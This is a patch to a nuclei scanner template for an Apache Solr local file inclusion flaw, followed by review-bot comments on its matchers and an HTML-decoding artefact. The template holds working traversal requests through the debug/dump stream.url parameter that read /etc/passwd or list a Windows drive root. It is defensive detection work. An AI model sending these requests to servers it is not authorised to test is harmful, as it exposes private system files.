From 843264155b58ddf47485d8d5f7fb8d9ba5e5cd3b Mon Sep 17 00:00:00 2001
From: Philippe Delteil
Date: Thu, 1 Dec 2022 18:51:21 -0500
Subject: [PATCH] Update apache-solr-file-read.yaml

1. The added GET request triggers a file local read on Windows OS.
2. Matcher added to the Response trigger by 1.
3. Matcher for other cases (Errors, ie. not found path)
---
 .../apache/apache-solr-file-read.yaml | 27 ++++++++++++++-----
 1 file changed, 20 insertions(+), 7 deletions(-)

diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml
index ccb3629709..6ccddb4c27 100644
--- a/vulnerabilities/apache/apache-solr-file-read.yaml
+++ b/vulnerabilities/apache/apache-solr-file-read.yaml
@@ -2,7 +2,7 @@ id: apache-solr-file-read
 info:
 name: Apache Solr <= 8.8.1 - Local File Inclusion
- author: DhiyaneshDk
+ author: DhiyaneshDk, philippedelteil
 severity: high
 description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
 reference:
@@ -22,6 +22,12 @@ requests:
 Host: {{Hostname}}
 Accept-Language: en
 Connection: close
+
+ - |
+ GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Connection: close
 - |
 GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1
@@ -37,14 +43,21 @@ requests:
 regex:
 - '"name"\:"(.*?)"'
- matchers-condition: and
 matchers:
- - type: status
- status:
- - 200
-
+ - type: word
+ name: "Windows"
+ words:
+ - "Windows"
+ - "Users"
+ - "org.apache.solr.handler.DumpRequestHandler"
+ condition: and
 - type: regex
+ name: "Linux"
 regex:
 - "root:.*:0:0:"
-
+ - type: word
+ name: "Other"
+ words:
+ - "java.io.FileNotFoundException"
+
 # Enhanced by mp on 2022/07/22
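Review bot: The added `GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../` request points `stream.url` at a directory rather than a file, and judging by the `"Windows"`/`"Users"` words the new matcher expects, the signal it relies on appears to be a listing of the drive root, yet nothing in the template says so; a comment above the new `- |` such as `# Windows probe: stream.url on a traversed directory; the "Windows" matcher keys on drive-root folder names` would spare the next maintainer from reverse-engineering the matcher. The probe is also issued to every target regardless of platform, so a note that it is expected to produce no match on non-Windows hosts would help. Both request lines show `¶m=ContentStream`, which looks like `&param=` HTML-decoded by the page that rendered this patch; confirm the committed file still reads `&param=ContentStream`, since the existing /etc/passwd request depends on that argument. The enclosing `raw:` list starts outside the hunk.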
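Review bot: With `matchers-condition: and` and the 200 status matcher removed, the three matchers fall back to nuclei's default `or`, so the `Other` matcher fires on `java.io.FileNotFoundException` alone and the template reports a high-severity file read for what is only an error response; that exception name is not specific to `stream.url` handling. If the intent is to flag that the handler attempted to open the supplied path, document it and tighten it: a comment `# "Other": stream.url was processed but the path did not exist; evidence of remote streaming, not of a successful read` above that matcher, plus a second required word tied to this request under `condition: and` (the `DumpRequestHandler` class name the Windows matcher already uses, if it is present in the error body — confirm against a real response). Writing `matchers-condition: or` explicitly above `matchers:` would also make it clear that any one of Windows/Linux/Other is sufficient. The parent `requests` entry starts outside the hunk.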